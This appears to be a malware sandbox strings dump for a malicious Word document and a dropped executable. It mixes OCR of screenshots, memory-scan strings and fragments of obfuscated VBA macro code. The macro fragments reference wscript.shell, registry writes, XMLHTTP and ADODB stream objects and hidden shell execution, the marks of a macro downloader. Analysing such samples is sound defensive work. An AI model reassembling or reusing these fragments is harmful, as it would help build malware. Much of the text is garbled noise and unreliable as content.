Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Module=Module1

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

MSVCRT.dll

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

MSWordDocWord.Document.89q

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

MulaO!0' Enabl`eButt2ZAktifBoole0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

N4'ZLV'' '= 'P&''Y6Tipe_m==0a=_ U -'!A66#q'6

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

n9Ul9iirtlOnin

Ansi based on Image Processing (screen_3.png)

nachvg_o_ggn_

Ansi based on Image Processing (screen_3.png)

nachvi_o_gin.

Ansi based on Image Processing (screen_2.png)

Name="Project"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Niuir

Ansi based on Image Processing (screen_3.png)

NodeParent0MyCommandg<0JumSelect20

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

nrc5P:*Loooa!Replace("[email protected]("q6"( 3.Environment(PrD4N6ocQesQsq",1 ""))

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

nstandard

Ansi based on Image Processing (screen_0.png)

OfficeDiagnostics Information

Ansi based on Dropped File (465031.od)

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

oftware\Microsoft\Office\Common\OffDiag\6bb5dc16-23a7-4e31-8904-aa3fab5a6b6e322d0479-12b9-430f-8333-7fc25800146b

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

oU1\^E

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

o|/0r|/@u|/

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000001.495406.2F9DE000.00000004.mdmp)

p""$([email protected] H hBpx$B0Pp

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

p+Rp+RVBAp+Rp+Rdir<

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

p//4///B//0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

P___iti__n

Ansi based on Image Processing (screen_4.png)

P`hBpx"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.408000.00000002.mdmp)

PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.408000.00000002.mdmp)

[email protected]&, posBuffer$L_Q/H2

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

PesanError20FrmDiagnosa0GetText0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

PlPP+

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

ProductName

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

ProxyEnable

Unicode based on Runtime Data (noeebene.exe )

Public Copy(Target, Simpan) As LongCallF\Gk6, 1nFolderSaya(fAihMid$(Amb8ilN_, Len) - 4=MyRight(ByVal [email protected],

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Public FuncApakak() As Boolea!CariTipe`"FolderFE+?je.CustomInfoResult(epMgrV @ant, [email protected]` Dim isntCoIim=`F9!LJBd) U7K g& (Chria]18 *f- 945!8887225NaiP$3 0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Public @ viewMyNotepad(ByVal FileName As St ring)LongDim hCDfLendata(;Byt;U-VR= VbOpen-_()IftThe m<(CalBl"Read

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Public FI As SHFILEINFOA`[email protected]&H200NTYP

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Public Sub CreateKey(Folder As String, `Value Dim b$ObjectOn Error Resume Nex,hSet(=_-("wscript.shell"Pb.RegWrite v

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Q? KeepOnTop(F<, yakivP cSetWindowPos F.hWnd8, -)3&2 Or!OOA Oa!

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

qQv? GTS$Mn?e6:

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

r_'ndgr_---_---_SPakin'

Ansi based on Image Processing (screen_12.png)

ra'ndgr_---_---_SPakin'

Ansi based on Image Processing (screen_8.png)

ra'ndgr_---_---_SPaltin'

Ansi based on Image Processing (screen_4.png)

Rgchgrch;grgn

Ansi based on Image Processing (screen_2.png)

Rgchgrch__grgn

Ansi based on Image Processing (screen_3.png)

Richt_chriibung,

Ansi based on Image Processing (screen_3.png)

Richtcchriibung,

Ansi based on Image Processing (screen_2.png)

rict $$ A

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

ription

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

rnalName

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

rstdole>stdoleP

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]{u(pV(om)?

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

s___n__0ut

Ansi based on Image Processing (screen_0.png)

S___nl_0ut

Ansi based on Image Processing (screen_1.png)

s_ndung_n

Ansi based on Image Processing (screen_0.png)

S_ndung_n

Ansi based on Image Processing (screen_1.png)

SavedLegacySettings

Unicode based on Runtime Data (noeebene.exe )

Schr_ftak

Ansi based on Image Processing (screen_1.png)

seiten_ayaut

Ansi based on Image Processing (screen_4.png)

SendMessageW

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

sendungen

Ansi based on Image Processing (screen_4.png)

SHFIELD_zObject(Mid("H7y7yMicEFV212VSD", p-3) +c6("LKJCDrosoftLeft(".XMLHTTP88IUYGH774668bSlash1S"Adodb.eam";Ah&`= \A6Shell.XAppnGoTo ss88.TV vP:SttG"Q

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

SHFILEINFO|0SHGFI_DISPLAYNAME0SHGFI_TYPENAME5<0MAX_PATH(0HashHeader_2K0HashHeader_1J0HashHeader_3L0HashHeader_4M0HashHeader_5N0HashHeader_6O0hIconM0iIcon0dwAttributesr0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

SHGetFileInfo0Load_Icon~(0LVRead~0ImageListm|0lvwImageSmallIconm0ico32}y0lvwImageLargeIconF#0ico64y0Hapusf0Round0ViewI0lvwTilew0lvwIcon0IconCountr0CekPasswordy)0ListItems0Addr0SubItem.0ShowInTileView*0Hex0AddFromDcS0Pic2o0hDCe0Picf0fillCustComboBoxrI0ru_0CustomInfoGetResult70FolderXx0Switch0Send0UniToAnsi|<0DaftarRegW0CreateKey0Appt0EXEName0ValueK0RegWrite.0Bersihkan0tempFolV0SetAttrC0vbNormal-0ShellV0vbHideW0MasukkanTreea0hNodeh0aX0NamaFileX0Clear0BacaFile0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Si_in-

Ansi based on Image Processing (screen_13.png)

Si_inl_0ut

Ansi based on Image Processing (screen_13.png)

siitiiinrichtin

Ansi based on Image Processing (screen_4.png)

Siitiiinrichtin

Ansi based on Image Processing (screen_8.png)

Siitinhintirgrund

Ansi based on Image Processing (screen_8.png)

siitinhintirgrund

Ansi based on Image Processing (screen_4.png)

Siitinlayaut

Ansi based on Image Processing (screen_8.png)

Siitinri'ndir

Ansi based on Image Processing (screen_4.png)

Sikin-

Ansi based on Image Processing (screen_4.png)

Sikinri'ndir

Ansi based on Image Processing (screen_8.png)

Sindungin

Ansi based on Image Processing (screen_13.png)

Sng*5

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

soft Office Diagnostics

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

Sp"chb!a"n

Ansi based on Image Processing (screen_2.png)

Sprichbla_in

Ansi based on Image Processing (screen_3.png)

Sprichblatin

Ansi based on Image Processing (screen_2.png)

SprnhblaKn

Ansi based on Image Processing (screen_2.png)

ssembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><noInherit></noInherit><assemblyIdentity processorArchitecture="x86" type="win32" name="OffDiag" version="12.0.4518.1014"></assemblyIdentity><description>Office Diagnostics</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency optional="yes"><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.1.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="x86"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PA

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

start

Ansi based on Image Processing (screen_4.png)

StringFileInfo

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

StripNulls0OriginalStr0ChrW0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

SYSTEMTIMEA0wYear=0wMonth&80

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

sz780End hriva SECURITY_ATTRIBUTESnLengthlpSecurityDescr [email protected]|[email protected]#[email protected] YSTEMwYea'[email protected],HHoYMillis:[email protected]}[email protected]

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

szDisplayName+0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

szTypeName0SECURITY_ATTRIBUTESs0nLength&0lpSecurityDescriptorn0bInheritHandle%0FILETIME%0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

t,_JZiiIinnummirn_

Ansi based on Image Processing (screen_4.png)

T,[email protected]!+&j"0W9Myej?PoK+FAGcL8ItemInde&d\ya!&A

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

tch__gn_

Ansi based on Image Processing (screen_3.png)

TerbukaBooleanFTemPFavoDim j&, m`d&

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

th.._

Ansi based on Image Processing (screen_3.png)

ThisDocument=78, 78, 1315, 405,

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Ti-m'Jlllhl''J'-h

Ansi based on Image Processing (screen_10.png)

TjmUlllhl'uch

Ansi based on Image Processing (screen_8.png)

TjmUlllhl'UCh

Ansi based on Image Processing (screen_12.png)

TN 7a!OuXZD9c7jM6.Open (%tv]$cggg.!`(Bndex

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Tr $ $ 'k8 'i(]]( !H:

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

U%'&$]

Ansi based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

ub_rpr__n

Ansi based on Image Processing (screen_0.png)

Ub_rprM_n

Ansi based on Image Processing (screen_1.png)

uctVersion

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

UIFILE

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

uJScted=P]Q

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

UNCAsIntranet

Unicode based on Runtime Data (noeebene.exe )

USER32.dll

Ansi based on Memory/File Scan (noeebene.exe , 00199703-00003024.00000000.202031.404000.00000002.mdmp)

UsrlCin'

Ansi based on Image Processing (screen_10.png)

Usrlcin'

Ansi based on Image Processing (screen_7.png)

uwxz~

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

V+ 7 - 38VBg`&{id10t0B*aK7[v`U`SLqCCR

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

v8m-.xo(-ms~|s>%O04h=!e\f

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

v_m__c_

Ansi based on Image Processing (screen_0.png)

V_m__c_

Ansi based on Image Processing (screen_1.png)

ValidFolder = True1PElslFa*End If

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Vallbild-

Ansi based on Image Processing (screen_13.png)

VarFileInfo

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

VaryFI FI_DISPLAYNAME Or TYPE!Load_Icon(

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

VbCloseHandle{0ViewArc0autoT0Tempat0TempDir0ExtractFile0PathFileExists0Panggilxd0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

vbNormalFocus0Masukkan}Z0UkWal0UkPackd0AttrO0CRC0Tipe0Of^0RatioD-0NamaTempA0hFileW70MyAttr|0DirPot0G^0cListItem0Indek0HanyaNama0CreateFileW0CloseHandleY0Pic1n0Cls~0PicL0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

VbOpenFileL0VbFileLen0VbReadFileB0StrConvx'0vbUnicode0frmViewv0tViewL0Show0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

veme;ce

Ansi based on Image Processing (screen_4.png)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

VeVNsV..--C?$0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

viewMyNotepad`v0FileNamej0hFile#0fLen60data;0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

VIf Right(F

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Vimiici

Ansi based on Image Processing (screen_13.png)

virg_iichin

Ansi based on Image Processing (screen_3.png)

VS_VERSION_INFO

Unicode based on Memory/File Scan (OffDiag.exe , 00465390-00003232.00000000.488328.2FA30000.00000002.mdmp)

VWSVV

Ansi based on Runtime Data (noeebene.exe )

vXNnJPajSRIeSNewBIs_PmoveDir!ory Ptr(Buat=# dSfAmbilExte`Ref p

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

wDayOfWeekH0wDay_0wHourU0wMinuteo0wSecond0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

we___0

Ansi based on Image Processing (screen_4.png)

we_i_0

Ansi based on Image Processing (screen_13.png)

wgch,g_n.

Ansi based on Image Processing (screen_13.png)

wirdin.

Ansi based on Image Processing (screen_2.png)

wMillisecondsd{0MyO^0FokusNode.0

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

WrlinlirUn9'nmrUCi'

Ansi based on Image Processing (screen_8.png)

wscript.shell$.Di | [email protected]}o

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

X 'ribute !!\ !!.exe$ '[email protected] [email protected]" $$'Ttenti $ $Al"ix $ $$ '="xs:si]8Ph

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

X"h.0 8Xx"

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

X(h(p(((

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

[email protected]`4i6`+DP0iFH`J+LXi(X`@ P(8N`P2 5`T'`V+`+x0)deie`H`0p!iDai'^i$'ar=`p+P0i+i+0iPi$p+i+0i0+ `+ ` h P p +

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Y\n9?[]<[email protected]_,Y\[email protected];{rQ

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

yiC^osM1RQ_PO/gl$}AO0x?:-#jA.WVE?|OPNSu}~g_|wKkDfjNt"ZHc-[4:MzvR<(

Ansi based on Hybrid Analysis (DOC201114_201114_001.DOC.bin)

Zw__ch'nabla

Ansi based on Image Processing (screen_0.png)

Zw__ch,nabla...